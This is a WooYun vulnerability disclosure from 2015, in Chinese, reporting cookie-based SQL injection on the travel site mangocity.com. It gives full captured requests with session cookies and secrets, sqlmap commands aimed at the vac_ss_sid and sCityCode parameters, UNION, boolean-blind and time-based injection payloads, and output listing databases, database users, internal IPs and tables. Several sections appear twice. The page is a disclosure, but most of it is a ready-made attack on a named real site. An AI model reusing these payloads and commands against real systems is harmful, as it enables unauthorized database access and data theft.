当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0126344

漏洞标题:芒果网存在多处SQL注入打包提交

相关厂商:芒果网

漏洞作者: 路人甲

提交时间:2015-07-13 12:11

修复时间:2015-07-18 12:12

公开时间:2015-07-18 12:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-13: 细节已通知厂商并且等待厂商处理中
2015-07-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

芒果网存在SQL注入

详细说明:

1.
芒果网存在SQL注入,cookie 部分存在sql注入
地址:www.mangocity.com/index.php/order/order_controller/index
抓的数据包

GET /index.php/order/order_controller/index HTTP/1.1
Cookie: SessionID=10.10.130.100.1436616783280042; sCityName=%E5%A4%A9%E6%B4%A5; sCityCode=TSN;
vac_ss_sid=10001; vac_ss_uid=9953; JSESSION_O2O=0000YfUCgsG707K2F16HbW96V3I:19h7oe5dr;
JESSION_mweb=0000RacF5QiTFjPrlsHCRHDhs4B:16a0iiimp;
JSESSION_114=0000LsA0EoAbtNqTijKHdfQ04Qc:11ujthiob; zjcode=21000;
JESSION_TB2B=00019_zt6z86BIB7QLvrxTsCtfw:14i9pltcn; mg_rsd=w9cxjic40i07ckmx;
mg_osecond=1436616852; JESSION_TWEB2=0001X17eNnKkc9wGouWGjEf3wU8:12h2atcss;
JESSION_TWEB3=00008FyORCPPz6Si8rvUOqPECv5:14p5f5i7k;
JESSION_HWEB=0000BFlIo_dTYAOCUk4hF0OFGjo:11psgds7a; secret=c9f3001c7ffe0b4d5c1ce72f9ee329a8;
security_secret=07Wax3ciaLkOC4g3TWNsbqAWROCGAtSWb8tz8C0amHwVQI1v4VgFow%3D%3D;
JESSION_MKT=0003mKvGNxcnh5Cl2_9__gwIM6E:-308BSD:-1458J2N; clientlanguage=zh_CN;
JESSION_GDS2=0000x8nxWNTBmdetJ9ockuryrSn:13rov2jq9; mangocd=null; security_mangocd=
X-Requested-With: XMLHttpRequest
Referer: http://www.mangocity.com:80/
Host: www.mangocity.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/28.0.1500.63 Safari/537.36
Accept: */*


注入参数:vac_ss_sid
sqlmap 注入

<>python sqlmap.py -r 3.txt -p "vac_ss_sid" --dbms "mysql" --current-user --dbs/code>
<code>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: Cookie
Parameter: vac_ss_sid
Type: UNION query
Title: MySQL UNION query (16) - 6 columns
Payload: SessionID=10.10.130.100.1436616783280042; sCityName=%E5%A4%A9%E6%B4%A5; sCityCode=TSN; vac_ss_sid=if(now()=sysdate()%2Csleep(0)%2C0)/*'XOR(if(now()=sysdate(
---
[21:59:54] [INFO] testing MySQL
[21:59:55] [INFO] confirming MySQL
you provided a HTTP Cookie header value. The target url provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them
[21:59:58] [WARNING] automatically patching output having last char trimmed
[21:59:58] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.28
back-end DBMS: MySQL >= 5.0.0
[21:59:58] [INFO] fetching current user
current user: 'ser@10.10.4.56'
available databases [3]:
[*] information_schema
[*] servicegate
[*] test
Database: servicegate
[13 tables]
+-------------------------------+
| rbac_auth |
| rbac_menu |
| rbac_node |
| rbac_role |
| rbac_user |
| tbl_captcha |
| tbl_channel_price |
| tbl_channel_price_bak20150612 |
| tbl_client_auth |
| tbl_client_auth_bak20150514 |
| tbl_service_map |
| tbl_service_type |
| tbl_sessions |
+-------------------------------+


好了就这些了。
芒果网存在SQL注入,cookie 部分存在sql注入
地址:www.mangocity.com/index.php/order/order_controller/index
抓的数据包

GET /index.php/order/order_controller/index HTTP/1.1
Cookie: SessionID=10.10.130.100.1436616783280042; sCityName=%E5%A4%A9%E6%B4%A5; sCityCode=TSN;
vac_ss_sid=10001; vac_ss_uid=9953; JSESSION_O2O=0000YfUCgsG707K2F16HbW96V3I:19h7oe5dr;
JESSION_mweb=0000RacF5QiTFjPrlsHCRHDhs4B:16a0iiimp;
JSESSION_114=0000LsA0EoAbtNqTijKHdfQ04Qc:11ujthiob; zjcode=21000;
JESSION_TB2B=00019_zt6z86BIB7QLvrxTsCtfw:14i9pltcn; mg_rsd=w9cxjic40i07ckmx;
mg_osecond=1436616852; JESSION_TWEB2=0001X17eNnKkc9wGouWGjEf3wU8:12h2atcss;
JESSION_TWEB3=00008FyORCPPz6Si8rvUOqPECv5:14p5f5i7k;
JESSION_HWEB=0000BFlIo_dTYAOCUk4hF0OFGjo:11psgds7a; secret=c9f3001c7ffe0b4d5c1ce72f9ee329a8;
security_secret=07Wax3ciaLkOC4g3TWNsbqAWROCGAtSWb8tz8C0amHwVQI1v4VgFow%3D%3D;
JESSION_MKT=0003mKvGNxcnh5Cl2_9__gwIM6E:-308BSD:-1458J2N; clientlanguage=zh_CN;
JESSION_GDS2=0000x8nxWNTBmdetJ9ockuryrSn:13rov2jq9; mangocd=null; security_mangocd=
X-Requested-With: XMLHttpRequest
Referer: http://www.mangocity.com:80/
Host: www.mangocity.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/28.0.1500.63 Safari/537.36
Accept: */*


注入参数:vac_ss_sid
sqlmap 注入

<>python sqlmap.py -r 3.txt -p "vac_ss_sid" --dbms "mysql" --current-user --dbs/code>
<code>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: Cookie
Parameter: vac_ss_sid
Type: UNION query
Title: MySQL UNION query (16) - 6 columns
Payload: SessionID=10.10.130.100.1436616783280042; sCityName=%E5%A4%A9%E6%B4%A5; sCityCode=TSN; vac_ss_sid=if(now()=sysdate()%2Csleep(0)%2C0)/*'XOR(if(now()=sysdate(
---
[21:59:54] [INFO] testing MySQL
[21:59:55] [INFO] confirming MySQL
you provided a HTTP Cookie header value. The target url provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them
[21:59:58] [WARNING] automatically patching output having last char trimmed
[21:59:58] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.28
back-end DBMS: MySQL >= 5.0.0
[21:59:58] [INFO] fetching current user
current user: 'ser@10.10.4.56'
available databases [3]:
[*] information_schema
[*] servicegate
[*] test
Database: servicegate
[13 tables]
+-------------------------------+
| rbac_auth |
| rbac_menu |
| rbac_node |
| rbac_role |
| rbac_user |
| tbl_captcha |
| tbl_channel_price |
| tbl_channel_price_bak20150612 |
| tbl_client_auth |
| tbl_client_auth_bak20150514 |
| tbl_service_map |
| tbl_service_type |
| tbl_sessions |
+-------------------------------+


好了就这些了。

漏洞证明:

2.
芒果网主站存在cookie的SQL注入
地址:www.mangocity.com/alliance/9953/600003/index.php
注入参数为:sCityCode
抓的数据包

GET /alliance/9953/600003/index.php HTTP/1.1
Cookie: SessionID=10.10.130.100.1436664797337685; sCityName=%E6%B7%B1%E5%9C%B3; sCityCode=SZX;
vac_ss_sid=600003; vac_ss_uid=9953; JSESSION_O2O=0000g2P_B2KsVBC9UgSWs2sH3pm:19h7oe5dr;
JESSION_mweb=0000t6hPKcSYWruXYYJF2FvStM1:16a0ij95r;
JSESSION_114=0000y3C9yQOyG5tQGOQTC4gqpIo:11ujthiob; zjcode=20060; mg_rsd=pri4rghalahd4ffv;
mg_osecond=1436664867; JESSION_TB2B=0001xLeN9F8Bbl6CfjoVIfBytSo:14i9pmibo;
JSESSION_BBS=0000PEHkPLRyF76kXB0_lwrAdjP:11pshoprh;
JESSION_TWEB2=0001keuiQf0G5eXVp_f9RJVAyMF:12h2atcss; JESSION_HWEB=00007-
IuxvHKSEU9rg13_oHNS9v:11psgdrdg; JESSION_WPKG2=0001ylXkja7unFriYPo72_lMMlc:15e7d7p4e;
JESSION_TWEB3=0000OxwDQp1ViijTkMF0O_yTf-s:14p5f6gga; secret=5811e8bb13a3142690ede4ab10718e9e;
security_secret=%2FSvCNjbul3PpLz668lFcTG29zZyBB%2BUhLnhb1lye%2BHoVQI1v4VgFow%3D%3D;
JESSION_MKT=0007glwyFwfUlzaOk-1J8c7l-Q9:-308BSD:-1458J2N; clientlanguage=zh_CN;
JESSION_GDS2=0000wni13FMous20P9k4Knxgp0R:13rov2jq9
X-Requested-With: XMLHttpRequest
Referer: http://www.mangocity.com:80/
Host: www.mangocity.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/28.0.1500.63 Safari/537.36
Accept: */*


使用sqlmap注入

python sqlmap.py -r 4.txt --level 4 -p "sCityCode" --dbms "mysql"  --dbs --current-user


sqlmap identified the following injection points with a total of 235 HTTP(s) requests:
---
Place: Cookie
Parameter: sCityCode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: SessionID=10.10.130.100.1436664797337685; sCityName=%E6%B7%B1%E5%9C%B3; sCityCode=SZX' AND 4248=4248 AND 'MDay'='MDay; vac_ss_sid=600003; vac_ss_uid=9953; JS
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: SessionID=10.10.130.100.1436664797337685; sCityName=%E6%B7%B1%E5%9C%B3; sCityCode=SZX' AND SLEEP(5) AND 'Cxdw'='Cxdw; vac_ss_sid=600003; vac_ss_uid=9953; JSE
---
[22:11:24] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.28
back-end DBMS: MySQL 5.0.11
available databases [3]:
[*] cms_langocity
[*] information_schema
[*] test
current user: 'cms@10.10.4.56'


好了就到这里了哈。
芒果网主站存在cookie的SQL注入
地址:www.mangocity.com/alliance/9953/600003/index.php
注入参数为:sCityCode
抓的数据包

GET /alliance/9953/600003/index.php HTTP/1.1
Cookie: SessionID=10.10.130.100.1436664797337685; sCityName=%E6%B7%B1%E5%9C%B3; sCityCode=SZX;
vac_ss_sid=600003; vac_ss_uid=9953; JSESSION_O2O=0000g2P_B2KsVBC9UgSWs2sH3pm:19h7oe5dr;
JESSION_mweb=0000t6hPKcSYWruXYYJF2FvStM1:16a0ij95r;
JSESSION_114=0000y3C9yQOyG5tQGOQTC4gqpIo:11ujthiob; zjcode=20060; mg_rsd=pri4rghalahd4ffv;
mg_osecond=1436664867; JESSION_TB2B=0001xLeN9F8Bbl6CfjoVIfBytSo:14i9pmibo;
JSESSION_BBS=0000PEHkPLRyF76kXB0_lwrAdjP:11pshoprh;
JESSION_TWEB2=0001keuiQf0G5eXVp_f9RJVAyMF:12h2atcss; JESSION_HWEB=00007-
IuxvHKSEU9rg13_oHNS9v:11psgdrdg; JESSION_WPKG2=0001ylXkja7unFriYPo72_lMMlc:15e7d7p4e;
JESSION_TWEB3=0000OxwDQp1ViijTkMF0O_yTf-s:14p5f6gga; secret=5811e8bb13a3142690ede4ab10718e9e;
security_secret=%2FSvCNjbul3PpLz668lFcTG29zZyBB%2BUhLnhb1lye%2BHoVQI1v4VgFow%3D%3D;
JESSION_MKT=0007glwyFwfUlzaOk-1J8c7l-Q9:-308BSD:-1458J2N; clientlanguage=zh_CN;
JESSION_GDS2=0000wni13FMous20P9k4Knxgp0R:13rov2jq9
X-Requested-With: XMLHttpRequest
Referer: http://www.mangocity.com:80/
Host: www.mangocity.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/28.0.1500.63 Safari/537.36
Accept: */*


使用sqlmap注入

python sqlmap.py -r 4.txt --level 4 -p "sCityCode" --dbms "mysql"  --dbs --current-user


sqlmap identified the following injection points with a total of 235 HTTP(s) requests:
---
Place: Cookie
Parameter: sCityCode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: SessionID=10.10.130.100.1436664797337685; sCityName=%E6%B7%B1%E5%9C%B3; sCityCode=SZX' AND 4248=4248 AND 'MDay'='MDay; vac_ss_sid=600003; vac_ss_uid=9953; JS
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: SessionID=10.10.130.100.1436664797337685; sCityName=%E6%B7%B1%E5%9C%B3; sCityCode=SZX' AND SLEEP(5) AND 'Cxdw'='Cxdw; vac_ss_sid=600003; vac_ss_uid=9953; JSE
---
[22:11:24] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.28
back-end DBMS: MySQL 5.0.11
available databases [3]:
[*] cms_langocity
[*] information_schema
[*] test
current user: 'cms@10.10.4.56'


好了就到这里了哈。
3.芒果网主站中存在cookie的SQL注入漏洞
注入地址:www.mangocity.com/alliance/9953/600003/index.php
参数:sCityCode
抓的数据包

GET /alliance/9953/600003/index.php HTTP/1.1
Cookie: SessionID=10.10.130.100.1436664797337685; sCityName=%E6%B7%B1%E5%9C%B3; sCityCode=SZX; vac_ss_sid=600003; vac_ss_uid=9953; JSESSION_O2O=0000g2P_B2KsVBC9UgSWs2sH3pm:19h7oe5dr; JESSION_mweb=0000t6hPKcSYWruXYYJF2FvStM1:16a0ij95r; JSESSION_114=0000y3C9yQOyG5tQGOQTC4gqpIo:11ujthiob; zjcode=20060; mg_rsd=pri4rghalahd4ffv; mg_osecond=1436664867; JESSION_TB2B=0001xLeN9F8Bbl6CfjoVIfBytSo:14i9pmibo; JSESSION_BBS=0000PEHkPLRyF76kXB0_lwrAdjP:11pshoprh; JESSION_TWEB2=0001keuiQf0G5eXVp_f9RJVAyMF:12h2atcss; JESSION_HWEB=00007-IuxvHKSEU9rg13_oHNS9v:11psgdrdg; JESSION_WPKG2=0001ylXkja7unFriYPo72_lMMlc:15e7d7p4e; JESSION_TWEB3=0000OxwDQp1ViijTkMF0O_yTf-s:14p5f6gga; secret=5811e8bb13a3142690ede4ab10718e9e; security_secret=%2FSvCNjbul3PpLz668lFcTG29zZyBB%2BUhLnhb1lye%2BHoVQI1v4VgFow%3D%3D; JESSION_MKT=0007glwyFwfUlzaOk-1J8c7l-Q9:-308BSD:-1458J2N; clientlanguage=zh_CN; JESSION_GDS2=0000wni13FMous20P9k4Knxgp0R:13rov2jq9
X-Requested-With: XMLHttpRequest
Referer: http://www.mangocity.com:80/
Host: www.mangocity.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*


使用SQLMAP注入工具

python sqlmap.py -r 4.txt --level 4 -p "sCityCode" --dbms "mysql"  -D  cms_langocity --tables


sqlmap identified the following injection points with a total of 235 HTTP(s) requests:
---
Place: Cookie
Parameter: sCityCode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: SessionID=10.10.130.100.1436664797337685; sCityName=%E6%B7%B1%E5%9C%B3; sCityCode=SZX' AND 4248=4248 AND 'MDay'='MDay; vac_ss_sid=600003; vac_ss_uid=9953; JS
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: SessionID=10.10.130.100.1436664797337685; sCityName=%E6%B7%B1%E5%9C%B3; sCityCode=SZX' AND SLEEP(5) AND 'Cxdw'='Cxdw; vac_ss_sid=600003; vac_ss_uid=9953; JSE
---
[22:11:24] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.28
back-end DBMS: MySQL 5.0.11
[22:11:24] [INFO] fetching database names
[22:11:24] [INFO] fetching number of databases
[22:11:24] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[22:11:24] [INFO] retrieved: 3
[22:11:37] [INFO] retrieved: information_schema
[22:14:50] [INFO] retrieved: cms_langocity
[22:17:35] [INFO] retrieved: test
available databases [3]:
[*] cms_langocity
[*] information_schema
[*] test


好吧!就这些了

修复方案:

过滤咯

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-07-18 12:12

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无